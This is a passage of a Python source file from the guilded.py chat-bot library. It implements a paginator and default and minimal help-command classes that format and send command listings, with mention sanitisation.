] | 19 | 2020-09-07T21:54:42.000Z | 2022-02-08T05:08:05.000Z | guilded/ext/commands/help.py | ThomasJRyan/guilded.py | e1bb5cab839c80c851d4538111e4f1563bb15187 | [
"MIT"
] | 24 | 2020-09-05T16:28:42.000Z | 2022-03-16T02:31:10.000Z | """
MIT License
Copyright (c) 2020-present windowsboy111, shay (shayypy)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
------------------------------------------------------------------------------
This project includes code from https://github.com/Rapptz/discord.py, which is
available under the MIT license:
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
import functools
import itertools
import re
import guilded.utils
from .context import Context
from .core import Command, Group
from .errors import CommandError
__all__ = (
'Paginator',
'HelpCommand',
'DefaultHelpCommand',
'MinimalHelpCommand',
)
# help -> shows info of bot on top/bottom and lists subcommands
# help command -> shows detailed info of command
# help command <subcommand chain> -> same as above
# <description>
# <command signature with aliases>
# <long doc>
# Cog:
# <command> <shortdoc>
# <command> <shortdoc>
# Other Cog:
# <command> <shortdoc>
# No Category:
# <command> <shortdoc>
# Type <prefix>help command for more info on a command.
# You can also type <prefix>help category for more info on a category.
class Paginator:
"""A class that aids in paginating code blocks for Guilded messages.
.. container:: operations
.. describe:: len(x)
Returns the total number of characters in the paginator.
Attributes
-----------
prefix: :class:`str`
The prefix inserted to every page. e.g. three backticks.
suffix: :class:`str`
The suffix appended at the end of every page. e.g. three backticks.
max_size: :class:`int`
The maximum amount of codepoints allowed in a page.
linesep: :class:`str`
The character string inserted between lines. e.g. a newline character.
"""
def __init__(self, prefix='```', suffix='```', max_size=2000, linesep='\n'):
self.prefix = prefix
self.suffix = suffix
self.max_size = max_size
self.linesep = linesep
self.clear()
def clear(self):
"""Clears the paginator to have no pages."""
if self.prefix is not None:
self._current_page = [self.prefix]
self._count = len(self.prefix) + self._linesep_len # prefix + newline
else:
self._current_page = []
self._count = 0
self._pages = []
@property
def _prefix_len(self):
return len(self.prefix) if self.prefix else 0
@property
def _suffix_len(self):
return len(self.suffix) if self.suffix else 0
@property
def _linesep_len(self):
return len(self.linesep)
def add_line(self, line='', *, empty=False):
"""Adds a line to the current page.
If the line exceeds the :attr:`max_size` then an exception
is raised.
Parameters
-----------
line: :class:`str`
The line to add.
empty: :class:`bool`
Indicates if another empty line should be added.
Raises
------
RuntimeError
The line was too big for the current :attr:`max_size`.
"""
max_page_size = self.max_size - self._prefix_len - self._suffix_len - 2 * self._linesep_len
if len(line) > max_page_size:
raise RuntimeError(f'Line exceeds maximum page size {max_page_size}')
if self._count + len(line) + self._linesep_len > self.max_size - self._suffix_len:
self.close_page()
self._count += len(line) + self._linesep_len
self._current_page.append(line)
if empty:
self._current_page.append('')
self._count += self._linesep_len
def close_page(self):
"""Prematurely terminate a page."""
if self.suffix is not None:
self._current_page.append(self.suffix)
self._pages.append(self.linesep.join(self._current_page))
if self.prefix is not None:
self._current_page = [self.prefix]
self._count = len(self.prefix) + self._linesep_len # prefix + linesep
else:
self._current_page = []
self._count = 0
def __len__(self):
return sum(len(p) for p in self._pages) + self._count
@property
def pages(self):
"""List[:class:`str`]: Returns the rendered list of pages."""
# we have more than just the prefix in our current page
if len(self._current_page) > (0 if self.prefix is None else 1):
self.close_page()
return self._pages
def __repr__(self):
fmt = '<Paginator prefix: {0.prefix!r} suffix: {0.suffix!r} linesep: {0.linesep!r} max_size: {0.max_size} count: {0._count}>'
return fmt.format(self)
def _not_overriden(f):
f.__help_command_not_overriden__ = True
return f
class _HelpCommandImpl(Command):
def __init__(self, inject, *args, **kwargs):
super().__init__(inject.command_callback, *args, **kwargs)
self._original = self._injected = inject
async def prepare(self, ctx):
self._injected = injected = self._original.copy()
injected.context = ctx
self.callback = injected.command_callback
on_error = injected.on_help_command_error
if not hasattr(on_error, '__help_command_not_overriden__'):
self.on_error = self._on_error_cog_implementation if self.cog else on_error
await super().prepare(ctx)
async def _parse_arguments(self, ctx):
# Make the parser think we don't have a cog so it doesn't
# inject the parameter into `ctx.args`.
original_cog = self.cog
self.cog = None
try:
await super()._parse_arguments(ctx)
finally:
self.cog = original_cog
async def _on_error_cog_implementation(self, _, ctx, error):
await self._injected.on_help_command_error(ctx, error)
@property
def clean_params(self):
result = self.params.copy()
try:
del result[next(iter(result))]
except StopIteration:
raise ValueError('Missing context parameter') from None
else:
return result
def _inject_into_cog(self, cog):
# Warning: hacky
# Make the cog think that get_commands returns this command
# as well if we inject it without modifying __cog_commands__
# since that's used for the injection and ejection of cogs.
def wrapped_get_commands(*, _original=cog.get_commands):
ret = _original()
ret.append(self)
return ret
# Ditto here
def wrapped_walk_commands(*, _original=cog.walk_commands):
yield from _original()
yield self
functools.update_wrapper(wrapped_get_commands, cog.get_commands)
functools.update_wrapper(wrapped_walk_commands, cog.walk_commands)
cog.get_commands = wrapped_get_commands
cog.walk_commands = wrapped_walk_commands
self.cog = cog
def _eject_cog(self):
if self.cog is None:
return
# revert back into their original methods
cog = self.cog
cog.get_commands = cog.get_commands.__wrapped__
cog.walk_commands = cog.walk_commands.__wrapped__
self.cog = None
class HelpCommand:
r"""The base implementation for help command formatting.
.. note::
Internally instances of this class are deep copied every time
the command itself is invoked to prevent a race condition
mentioned in :dpyissue:`2123`.
This means that relying on the state of this class to be
the same between command invocations would not work as expected.
Attributes
------------
context: Optional[:class:`Context`]
The context that invoked this help formatter. This is generally set after
the help command assigned, :func:`command_callback`\, has been called.
show_hidden: :class:`bool`
Specifies if hidden commands should be shown in the output.
Defaults to ``False``.
verify_checks: Optional[:class:`bool`]
Specifies if commands should have their :attr:`.Command.checks` called
and verified. If ``True``, always calls :attr:`.Command.checks`.
If ``None``, only calls :attr:`.Command.checks` in a guild setting.
If ``False``, never calls :attr:`.Command.checks`. Defaults to ``True``.
command_attrs: :class:`dict`
A dictionary of options to pass in for the construction of the help command.
This allows you to change the command behaviour without actually changing
the implementation of the command. The attributes will be the same as the
ones passed in the :class:`.Command` constructor.
"""
MENTION_TRANSFORMS = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere',
r'<@!?[a-zA-Z0-9]{8}>': '@deleted-user',
r'<@&[a-zA-Z0-9]{8}>': '@deleted-role',
}
MENTION_PATTERN = re.compile('|'.join(MENTION_TRANSFORMS.keys()))
def __new__(cls, *args, **kwargs):
# To prevent race conditions of a single instance while also allowing
# for settings to be passed the original arguments passed must be assigned
# to allow for easier copies (which will be made when the help command is actually called)
# see Rapptz/discord.py issue 2123
self = super().__new__(cls)
# Shallow copies cannot be used in this case since it is not unusual to pass
# instances that need state, e.g. Paginator or what have you into the function
# The keys can be safely copied as-is since they're 99.99% certain of being
# string keys
deepcopy = copy.deepcopy
self.__original_kwargs__ = {k: deepcopy(v) for k, v in kwargs.items()}
self.__original_args__ = deepcopy(args)
return self
def __init__(self, **options):
self.show_hidden = options.pop('show_hidden', False)
self.verify_checks = options.pop('verify_checks', True)
self.command_attrs = attrs = options.pop('command_attrs', {})
attrs.setdefault('name', 'help')
attrs.setdefault('help', 'Shows this message')
self.context: Context = None
self._command_impl = _HelpCommandImpl(self, **self.command_attrs)
def copy(self):
obj = self.__class__(*self.__original_args__, **self.__original_kwargs__)
obj._command_impl = self._command_impl
return obj
def _add_to_bot(self, bot):
command = _HelpCommandImpl(self, **self.command_attrs)
bot.add_command(command)
self._command_impl = command
def _remove_from_bot(self, bot):
bot.remove_command(self._command_impl.name)
self._command_impl._eject_cog()
def add_check(self, func):
"""
Adds a check to the help command.
Parameters
----------
func
The function that will be used as a check.
"""
self._command_impl.add_check(func)
def remove_check(self, func):
"""
Removes a check from the help command.
This function is idempotent and will not raise an exception if
the function is not in the command's checks.
Parameters
----------
func
The function to remove from the checks.
"""
self._command_impl.remove_check(func)
def get_bot_mapping(self):
"""Retrieves the bot mapping passed to :meth:`send_bot_help`."""
bot = self.context.bot
mapping = {cog: cog.get_commands() for cog in bot.cogs.values()}
mapping[None] = [c for c in bot.commands if c.cog is None]
return mapping
@property
def invoked_with(self):
"""Similar to :attr:`Context.invoked_with` except properly handles
the case where :meth:`Context.send_help` is used.
If the help command was used regularly then this returns
the :attr:`Context.invoked_with` attribute. Otherwise, if
it the help command was called using :meth:`Context.send_help`
then it returns the internal command name of the help command.
Returns
---------
:class:`str`
The command name that triggered this invocation.
"""
command_name = self._command_impl.name
ctx = self.context
if ctx is None or ctx.command is None or ctx.command.qualified_name != command_name:
return command_name
return ctx.invoked_with
def get_command_signature(self, command):
"""Retrieves the signature portion of the help page.
Parameters
------------
command: :class:`Command`
The command to get the signature of.
Returns
--------
:class:`str`
The signature for the command.
"""
parent = command.parent
entries = []
while parent is not None:
if not parent.signature or parent.invoke_without_command:
entries.append(parent.name)
else:
entries.append(parent.name + ' ' + parent.signature)
parent = parent.parent
parent_sig = ' '.join(reversed(entries))
if len(command.aliases) > 0:
aliases = '|'.join(command.aliases)
fmt = f'[{command.name}|{aliases}]'
if parent_sig:
fmt = parent_sig + ' ' + fmt
alias = fmt
else:
alias = command.name if not parent_sig else parent_sig + ' ' + command.name
return f'{self.context.clean_prefix}{alias} {command.signature}'
def remove_mentions(self, string):
"""Removes mentions from the string to prevent abuse.
This includes ``@everyone``, ``@here``, member mentions and role mentions.
Returns
-------
:class:`str`
The string with mentions removed.
"""
def replace(obj, *, transforms=self.MENTION_TRANSFORMS):
return transforms.get(obj.group(0), '@invalid')
return self.MENTION_PATTERN.sub(replace, string)
@property
def cog(self):
"""A property for retrieving or setting the cog for the help command.
When a cog is set for the help command, it is as-if the help command
belongs to that cog. All cog special methods will apply to the help
command and it will be automatically unset on unload.
To unbind the cog from the help command, you can set it to ``None``.
Returns
--------
Optional[:class:`Cog`]
The cog that is currently set for the help command.
"""
return self._command_impl.cog
@cog.setter
def cog(self, cog):
# Remove whatever cog is currently valid, if any
self._command_impl._eject_cog()
# If a new cog is set then inject it.
if cog is not None:
self._command_impl._inject_into_cog(cog)
def command_not_found(self, string):
"""|maybecoro|
A method called when a command is not found in the help command.
This is useful to override for i18n.
Defaults to ``No command called {0} found.``
Parameters
------------
string: :class:`str`
The string that contains the invalid command. Note that this has
had mentions removed to prevent abuse.
Returns
---------
:class:`str`
The string to use when a command has not been found.
"""
return f'No command called "{string}" found.'
def subcommand_not_found(self, command, string):
"""|maybecoro|
A method called when a command did not have a subcommand requested in the help command.
This is useful to override for i18n.
Defaults to either:
- ``'Command "{command.qualified_name}" has no subcommands.'``
- If there is no subcommand in the ``command`` parameter.
- ``'Command "{command.qualified_name}" has no subcommand named {string}'``
- If the ``command`` parameter has subcommands but not one named ``string``.
Parameters
------------
command: :class:`Command`
The command that did not have the subcommand requested.
string: :class:`str`
The string that contains the invalid subcommand. Note that this has
had mentions removed to prevent abuse.
Returns
---------
:class:`str`
The string to use when the command did not have the subcommand requested.
"""
if isinstance(command, Group) and len(command.all_commands) > 0:
return f'Command "{command.qualified_name}" has no subcommand named {string}'
return f'Command "{command.qualified_name}" has no subcommands.'
async def filter_commands(self, commands, *, sort=False, key=None):
"""|coro|
Returns a filtered list of commands and optionally sorts them.
This takes into account the :attr:`verify_checks` and :attr:`show_hidden`
attributes.
Parameters
------------
commands: Iterable[:class:`Command`]
An iterable of commands that are getting filtered.
sort: :class:`bool`
Whether to sort the result.
key: Optional[Callable[:class:`Command`, Any]]
An optional key function to pass to :func:`py:sorted` that
takes a :class:`Command` as its sole parameter. If ``sort`` is
passed as ``True`` then this will default as the command name.
Returns
---------
List[:class:`Command`]
A list of commands that passed the filter.
"""
if sort and key is None:
key = lambda c: c.name
iterator = commands if self.show_hidden else filter(lambda c: not c.hidden, commands)
if self.verify_checks is False:
# if we do not need to verify the checks then we can just
# run it straight through normally without using await.
return sorted(iterator, key=key) if sort else list(iterator)
if self.verify_checks is None and not self.context.guild:
# if verify_checks is None and we're in a DM, don't verify
return sorted(iterator, key=key) if sort else list(iterator)
# if we're here then we need to check every command if it can run
async def predicate(cmd):
try:
return await cmd.can_run(self.context)
except CommandError:
return False
ret = []
for cmd in iterator:
valid = await predicate(cmd)
if valid:
ret.append(cmd)
if sort:
ret.sort(key=key)
return ret
def get_max_size(self, commands):
"""Returns the largest name length of the specified command list.
Parameters
------------
commands: Sequence[:class:`Command`]
A sequence of commands to check for the largest size.
Returns
--------
:class:`int`
The maximum width of the commands.
"""
as_lengths = (guilded.utils._string_width(c.name) for c in commands)
return max(as_lengths, default=0)
def get_destination(self):
"""Returns the :class:`~guilded.abc.Messageable` where the help command will be output.
You can override this method to customise the behaviour.
By default this returns the context's channel.
Returns
-------
:class:`.abc.Messageable`
The destination where the help command will be output.
"""
return self.context.channel
async def send_error_message(self, error):
"""|coro|
Handles the implementation when an error happens in the help command.
For example, the result of :meth:`command_not_found` will be passed here.
You can override this method to customise the behaviour.
By default, this sends the error message to the destination
specified by :meth:`get_destination`.
.. note::
You can access the invocation context with :attr:`HelpCommand.context`.
Parameters
------------
error: :class:`str`
The error message to display to the user. Note that this has
had mentions removed to prevent abuse.
"""
destination = self.get_destination()
await destination.send(error)
@_not_overriden
async def on_help_command_error(self, ctx, error):
"""|coro|
The help command's error handler, as specified by :ref:`ext_commands_error_handler`.
Useful to override if you need some specific behaviour when the error handler
is called.
By default this method does nothing and just propagates to the default
error handlers.
Parameters
------------
ctx: :class:`Context`
The invocation context.
error: :class:`CommandError`
The error that was raised.
"""
pass
async def send_bot_help(self, mapping):
"""|coro|
Handles the implementation of the bot command page in the help command.
This function is called when the help command is called with no arguments.
It should be noted that this method does not return anything -- rather the
actual message sending should be done inside this method. Well behaved subclasses
should use :meth:`get_destination` to know where to send, as this is a customisation
point for other users.
You can override this method to customise the behaviour.
.. note::
You can access the invocation context with :attr:`HelpCommand.context`.
Also, the commands in the mapping are not filtered. To do the filtering
you will have to call :meth:`filter_commands` yourself.
Parameters
------------
mapping: Mapping[Optional[:class:`Cog`], List[:class:`Command`]]
A mapping of cogs to commands that have been requested by the user for help.
The key of the mapping is the :class:`~.commands.Cog` that the command belongs to, or
``None`` if there isn't one, and the value is a list of commands that belongs to that cog.
"""
return None
async def send_cog_help(self, cog):
"""|coro|
Handles the implementation of the cog page in the help command.
This function is called when the help command is called with a cog as the argument.
It should be noted that this method does not return anything -- rather the
actual message sending should be done inside this method. Well behaved subclasses
should use :meth:`get_destination` to know where to send, as this is a customisation
point for other users.
You can override this method to customise the behaviour.
.. note::
You can access the invocation context with :attr:`HelpCommand.context`.
To get the commands that belong to this cog see :meth:`Cog.get_commands`.
The commands returned not filtered. To do the filtering you will have to call
:meth:`filter_commands` yourself.
Parameters
-----------
cog: :class:`Cog`
The cog that was requested for help.
"""
return None
async def send_group_help(self, group):
"""|coro|
Handles the implementation of the group page in the help command.
This function is called when the help command is called with a group as the argument.
It should be noted that this method does not return anything -- rather the
actual message sending should be done inside this method. Well behaved subclasses
should use :meth:`get_destination` to know where to send, as this is a customisation
point for other users.
You can override this method to customise the behaviour.
.. note::
You can access the invocation context with :attr:`HelpCommand.context`.
To get the commands that belong to this group without aliases see
:attr:`Group.commands`. The commands returned not filtered. To do the
filtering you will have to call :meth:`filter_commands` yourself.
Parameters
-----------
group: :class:`Group`
The group that was requested for help.
"""
return None
async def send_command_help(self, command):
"""|coro|
Handles the implementation of the single command page in the help command.
It should be noted that this method does not return anything -- rather the
actual message sending should be done inside this method. Well behaved subclasses
should use :meth:`get_destination` to know where to send, as this is a customisation
point for other users.
You can override this method to customise the behaviour.
.. note::
You can access the invocation context with :attr:`HelpCommand.context`.
.. admonition:: Showing Help
:class: helpful
There are certain attributes and methods that are helpful for a help command
to show such as the following:
- :attr:`Command.help`
- :attr:`Command.brief`
- :attr:`Command.short_doc`
- :attr:`Command.description`
- :meth:`get_command_signature`
There are more than just these attributes but feel free to play around with
these to help you get started to get the output that you want.
Parameters
-----------
command: :class:`Command`
The command that was requested for help.
"""
return None
async def prepare_help_command(self, ctx, command=None):
"""|coro|
A low level method that can be used to prepare the help command
before it does anything. For example, if you need to prepare
some state in your subclass before the command does its processing
then this would be the place to do it.
The default implementation does nothing.
.. note::
This is called *inside* the help command callback body. So all
the usual rules that happen inside apply here as well.
Parameters
-----------
ctx: :class:`Context`
The invocation context.
command: Optional[:class:`str`]
The argument passed to the help command.
"""
pass
async def command_callback(self, ctx, *, command=None):
"""|coro|
The actual implementation of the help command.
It is not recommended to override this method and instead change
the behaviour through the methods that actually get dispatched.
- :meth:`send_bot_help`
- :meth:`send_cog_help`
- :meth:`send_group_help`
- :meth:`send_command_help`
- :meth:`get_destination`
- :meth:`command_not_found`
- :meth:`subcommand_not_found`
- :meth:`send_error_message`
- :meth:`on_help_command_error`
- :meth:`prepare_help_command`
"""
await self.prepare_help_command(ctx, command)
bot = ctx.bot
if command is None:
mapping = self.get_bot_mapping()
return await self.send_bot_help(mapping)
# Check if it's a cog
cog = bot.get_cog(command)
if cog is not None:
return await self.send_cog_help(cog)
maybe_coro = guilded.utils.maybe_coroutine
# If it's not a cog then it's a command.
# Since we want to have detailed errors when someone
# passes an invalid subcommand, we need to walk through
# the command group chain ourselves.
keys = command.split(' ')
cmd = bot.all_commands.get(keys[0])
if cmd is None:
string = await maybe_coro(self.command_not_found, self.remove_mentions(keys[0]))
return await self.send_error_message(string)
for key in keys[1:]:
try:
found = cmd.all_commands.get(key)
except AttributeError:
string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key))
return await self.send_error_message(string)
else:
if found is None:
string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key))
return await self.send_error_message(string)
cmd = found
if isinstance(cmd, Group):
return await self.send_group_help(cmd)
else:
return await self.send_command_help(cmd)
class DefaultHelpCommand(HelpCommand):
"""The implementation of the default help command.
This inherits from :class:`HelpCommand`.
It extends it with the following attributes.
Attributes
------------
width: :class:`int`
The maximum number of characters that fit in a line.
Defaults to 80.
sort_commands: :class:`bool`
Whether to sort the commands in the output alphabetically. Defaults to ``True``.
dm_help: Optional[:class:`bool`]
A tribool that indicates if the help command should DM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is DM'd. If ``False``, none of the help
output is DM'd. If ``None``, then the bot will only DM when the help
message becomes too long (dictated by more than :attr:`dm_help_threshold` characters).
Defaults to ``False``.
dm_help_threshold: Optional[:class:`int`]
The number of characters the paginator must accumulate before getting DM'd to the
user if :attr:`dm_help` is set to ``None``. Defaults to 1000.
indent: :class:`int`
How much to indent the commands from a heading. Defaults to ``2``.
commands_heading: :class:`str`
The command list's heading string used when the help command is invoked with a category name.
Useful for i18n. Defaults to ``"Commands:"``
no_category: :class:`str`
The string used when there is a command which does not belong to any category(cog).
Useful for i18n. Defaults to ``"No Category"``
paginator: :class:`Paginator`
The paginator used to paginate the help command output.
"""
def __init__(self, **options):
self.width = options.pop('width', 80)
self.indent = options.pop('indent', 2)
self.sort_commands = options.pop('sort_commands', True)
self.dm_help = options.pop('dm_help', False)
self.dm_help_threshold = options.pop('dm_help_threshold', 1000)
self.commands_heading = options.pop('commands_heading', "Commands:")
self.no_category = options.pop('no_category', 'No Category')
self.paginator = options.pop('paginator', None)
if self.paginator is None:
self.paginator = Paginator()
super().__init__(**options)
def shorten_text(self, text):
""":class:`str`: Shortens text to fit into the :attr:`width`."""
if len(text) > self.width:
return text[:self.width - 3].rstrip() + '...'
return text
def get_ending_note(self):
""":class:`str`: Returns help command's ending note. This is mainly useful to override for i18n purposes."""
command_name = self.invoked_with
return (
f"Type {self.context.clean_prefix}{command_name} command for more info on a command.\n"
f"You can also type {self.context.clean_prefix}{command_name} category for more info on a category."
)
def add_indented_commands(self, commands, *, heading, max_size=None):
"""Indents a list of commands after the specified heading.
The formatting is added to the :attr:`paginator`.
The default implementation is the command name indented by
:attr:`indent` spaces, padded to ``max_size`` followed by
the command's :attr:`Command.short_doc` and then shortened
to fit into the :attr:`width`.
Parameters
-----------
commands: Sequence[:class:`Command`]
A list of commands to indent for output.
heading: :class:`str`
The heading to add to the output. This is only added
if the list of commands is greater than 0.
max_size: Optional[:class:`int`]
The max size to use for the gap between indents.
If unspecified, calls :meth:`~HelpCommand.get_max_size` on the
commands parameter.
"""
if not commands:
return
self.paginator.add_line(heading)
max_size = max_size or self.get_max_size(commands)
get_width = guilded.utils._string_width
for command in commands:
name = command.name
width = max_size - (get_width(name) - len(name))
entry = f'{self.indent * " "}{name:<{width}} {command.short_doc}'
self.paginator.add_line(self.shorten_text(entry))
async def send_pages(self):
"""A helper utility to send the page output from :attr:`paginator` to the destination."""
destination = self.get_destination()
for page in self.paginator.pages:
await destination.send(page)
def add_command_formatting(self, command):
"""A utility function to format the non-indented block of commands and groups.
Parameters
------------
command: :class:`Command`
The command to format.
"""
if command.description:
self.paginator.add_line(command.description, empty=True)
signature = self.get_command_signature(command)
self.paginator.add_line(signature, empty=True)
if command.help:
try:
self.paginator.add_line(command.help, empty=True)
except RuntimeError:
for line in command.help.splitlines():
self.paginator.add_line(line)
self.paginator.add_line()
def get_destination(self):
ctx = self.context
if self.dm_help is True:
return ctx.author
elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold:
return ctx.author
else:
return ctx.channel
async def prepare_help_command(self, ctx, command):
self.paginator.clear()
await super().prepare_help_command(ctx, command)
async def send_bot_help(self, mapping):
ctx = self.context
bot = ctx.bot
if bot.description:
# <description> portion
self.paginator.add_line(bot.description, empty=True)
no_category = f'\u200b{self.no_category}:'
def get_category(command, *, no_category=no_category):
cog = command.cog
return cog.qualified_name + ':' if cog is not None else no_category
filtered = await self.filter_commands(bot.commands, sort=True, key=get_category)
max_size = self.get_max_size(filtered)
to_iterate = itertools.groupby(filtered, key=get_category)
# Now we can add the commands to the page.
for category, commands in to_iterate:
commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands)
self.add_indented_commands(commands, heading=category, max_size=max_size)
note = self.get_ending_note()
if note:
self.paginator.add_line()
self.paginator.add_line(note)
await self.send_pages()
async def send_command_help(self, command):
self.add_command_formatting(command)
self.paginator.close_page()
await self.send_pages()
async def send_group_help(self, group):
self.add_command_formatting(group)
filtered = await self.filter_commands(group.commands, sort=self.sort_commands)
self.add_indented_commands(filtered, heading=self.commands_heading)
if filtered:
note = self.get_ending_note()
if note:
self.paginator.add_line()
self.paginator.add_line(note)
await self.send_pages()
async def send_cog_help(self, cog):
if cog.description:
self.paginator.add_line(cog.description, empty=True)
filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands)
self.add_indented_commands(filtered, heading=self.commands_heading)
note = self.get_ending_note()
if note:
self.paginator.add_line()
self.paginator.add_line(note)
await self.send_pages()
class MinimalHelpCommand(HelpCommand):
"""An implementation of a help command with minimal output.
This inherits from :class:`HelpCommand`.
Attributes
------------
sort_commands: :class:`bool`
Whether to sort the commands in the output alphabetically. Defaults to ``True``.
commands_heading: :class:`str`
The command list's heading string used when the help command is invoked with a category name.
Useful for i18n. Defaults to ``"Commands"``
aliases_heading: :class:`str`
The alias list's heading string used to list the aliases of the command. Useful for i18n.
Defaults to ``"Aliases:"``.
dm_help: Optional[:class:`bool`]
A tribool that indicates if the help command should DM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is DM'd. If ``False``, none of the help
output is DM'd. If ``None``, then the bot will only DM when the help
message becomes too long (dictated by more than :attr:`dm_help_threshold` characters).
Defaults to ``False``.
dm_help_threshold: Optional[:class:`int`]
The number of characters the paginator must accumulate before getting DM'd to the
user if :attr:`dm_help` is set to ``None``. Defaults to 1000.
no_category: :class:`str`
The string used when there is a command which does not belong to any category(cog).
Useful for i18n. Defaults to ``"No Category"``
paginator: :class:`Paginator`
The paginator used to paginate the help command output.
"""
def __init__(self, **options):
self.sort_commands = options.pop('sort_commands', True)
self.commands_heading = options.pop('commands_heading', "Commands")
self.dm_help = options.pop('dm_help', False)
self.dm_help_threshold = options.pop('dm_help_threshold', 1000)
self.aliases_heading = options.pop('aliases_heading', "Aliases:")
self.no_category = options.pop('no_category', 'No Category')
self.paginator = options.pop('paginator', None)
if self.paginator is None:
self.paginator = Paginator(suffix=None, prefix=None)
super().__init__(**options)
async def send_pages(self):
"""A helper utility to send the page output from :attr:`paginator` to the destination."""
destination = self.get_destination()
for page in self.paginator.pages:
await destination.send(page)
def get_opening_note(self):
"""Returns help command's opening note. This is mainly useful to override for i18n purposes.
The default implementation returns ::
Use `{prefix}{command_name} [command]` for more info on a command.
You can also use `{prefix}{command_name} [category]` for more info on a category.
Returns
-------
:class:`str`
The help command opening note.
"""
command_name = self.invoked_with
return (
f"Use `{self.context.clean_prefix}{command_name} [command]` for more info on a command.\n"
f"You can also use `{self.context.clean_prefix}{command_name} [category]` for more info on a category."
)
def get_command_signature(self, command):
return f'{self.context.clean_prefix}{command.qualified_name} {command.signature}'
def get_ending_note(self):
"""Return the help command's ending note. This is mainly useful to override for i18n purposes.
The default implementation does nothing.
Returns
-------
:class:`str`
The help command ending note.
"""
return None
def add_bot_commands_formatting(self, commands, heading):
"""Adds the minified bot heading with commands to the output.
The formatting should be added to the :attr:`paginator`.
The default implementation is a bold underline heading followed
by commands separated by an EN SPACE (U+2002) in the next line.
Parameters
-----------
commands: Sequence[:class:`Command`]
A list of commands that belong to the heading.
heading: :class:`str`
The heading to add to the line.
"""
if commands:
# U+2002 Middle Dot
joined = '\u2002'.join(c.name for c in commands)
self.paginator.add_line(f'__**{heading}**__')
self.paginator.add_line(joined)
def add_subcommand_formatting(self, command):
"""Adds formatting information on a subcommand.
The formatting should be added to the :attr:`paginator`.
The default implementation is the prefix and the :attr:`Command.qualified_name`
optionally followed by an En dash and the command's :attr:`Command.short_doc`.
Parameters
-----------
command: :class:`Command`
The command to show information of.
"""
fmt = '{0}{1} \N{EN DASH} {2}' if command.short_doc else '{0}{1}'
self.paginator.add_line(fmt.format(self.context.clean_prefix, command.qualified_name, command.short_doc))
def add_aliases_formatting(self, aliases):
"""Adds the formatting information on a command's aliases.
The formatting should be added to the :attr:`paginator`.
The default implementation is the :attr:`aliases_heading` bolded
followed by a comma separated list of aliases.
This is not called if there are no aliases to format.
Parameters
-----------
aliases: Sequence[:class:`str`]
A list of aliases to format.
"""
self.paginator.add_line(f'**{self.aliases_heading}** {", ".join(aliases)}', empty=True)
def add_command_formatting(self, command):
"""A utility function to format commands and groups.
Parameters
------------
command: :class:`Command`
The command to format.
"""
if command.description:
self.paginator.add_line(command.description, empty=True)
signature = self.get_command_signature(command)
if command.aliases:
self.paginator.add_line(signature)
self.add_aliases_formatting(command.aliases)
else:
self.paginator.add_line(signature, empty=True)
if command.help:
try:
self.paginator.add_line(command.help, empty=True)
except RuntimeError:
for line in command.help.splitlines():
self.paginator.add_line(line)
self.paginator.add_line()
def get_destination(self):
ctx = self.context
if self.dm_help is True:
return ctx.author
elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold:
return ctx.author
else:
return ctx.channel
async def prepare_help_command(self, ctx, command):
self.paginator.clear()
await super().prepare_help_command(ctx, command)
async def send_bot_help(self, mapping):
ctx = self.context
bot = ctx.bot
if bot.description:
self.paginator.add_line(bot.description, empty=True)
note = self.get_opening_note()
if note:
self.paginator.add_line(note, empty=True)
no_category = f'\u200b{self.no_category}'
def get_category(command, *, no_category=no_category):
cog = command.cog
return cog.qualified_name if cog is not None else no_category
filtered = await self.filter_commands(bot.commands, sort=True, key=get_category)
to_iterate = itertools.groupby(filtered, key=get_category)
for category, commands in to_iterate:
commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands)
self.add_bot_commands_formatting(commands, category)
note = self.get_ending_note()
if note:
self.paginator.add_line()
self.paginator.add_line(note)
await self.send_pages()
async def send_cog_help(self, cog):
bot = self.context.bot
if bot.description:
self.paginator.add_line(bot.description, empty=True)
note = self.get_opening_note()
if note:
self.paginator.add_line(note, empty=True)
if cog.description:
self.paginator.add_line(cog.description, empty=True)
filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands)
if filtered:
